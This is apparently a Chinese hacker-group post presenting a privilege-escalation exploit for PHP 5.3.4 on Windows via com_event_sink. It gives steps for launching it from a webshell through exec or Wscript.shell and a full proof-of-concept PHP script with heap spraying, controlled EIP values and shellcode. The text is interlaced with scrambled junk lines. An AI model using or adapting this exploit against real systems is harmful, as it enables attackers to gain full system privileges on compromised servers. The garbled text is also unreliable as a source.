PHP 5.3.4(WIN) COM_SINK权限提升漏洞

admin

PHP最新版已经更新至5.4.x，不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
+ U0 g+ d" u6 V5 x) S
测试方法如下：cmd /c x:\php\php.exe x:\test.php

下载php程序至本地，然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行，或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
# _' H. X% h5 g% L% M8 }这里是两个测试的截图：
9 k/ Y' v9 c, n
- t6 B! B( `1 ]& `3 e6 F) s
2 R$ D; |' ~- z  l9 v3 u8 I3 V
1 ~- u6 W4 X4 E8 e( ?- A. u

+ Q) s$ f6 W# b9 H成功利用此漏洞的攻击者将获得系统的最高权限
% P! K: v& O6 S3 n9 r7 \" O/ E

" U/ B& p$ S1 ^+ V" I3 I


% \1 f) j2 C0 S1 @' q! I9 u) \4 g关于漏洞分析稍后附上。一下是PoC代码：

<?php
; ]2 |3 Y, z9 l: u4 @) B7 W//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
# t% Z1 O3 \. E$ q$ P2 o7 q//$eip ="\x44\x43\x42\x41";
" C3 ~0 v! ~6 S4 {& j% O$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
: i& D+ b0 R( W% M, h) u$deodrant="";
" ~5 |% Q5 j; m- t1 H( v$axespray = str_repeat($eip.$eax,0x80);
3 }" v8 k; G4 [& d1 N5 M% y- ?//048d0190
6 a* @3 W2 ?$ o7 K$ Necho strlen($axespray);
* S0 H) g  U' @echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
echo "Silic Group Hacker Army - BlackBap.Org";
//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
$terminate = "T";
$u[] =$deodrant;
$r[] =$deodrant.$terminate;
1 Z% }0 G9 z, H2 S: R9 a$ A$a[] =$deodrant.$terminate;
, j$ f. s) }  c- n8 |! t- D$s[] =$deodrant.$terminate;
8 U3 Y* a5 l# t* u9 K$ d& s7 o//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
5 L% v) f# U7 f$vVar = new VARIANT(0x048d0000+180);
. r, O( |: m% u7 A; J8 R//弹窗代码(Shellcode)
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
- w9 h/ W% c% M2 Z$var2 = new VARIANT(0x41414242);
) e; l  w& a( i1 q$ _. Hcom_event_sink($vVar,$var2,$buffer);
& y# y- s; L, e& s+ ~$ q?>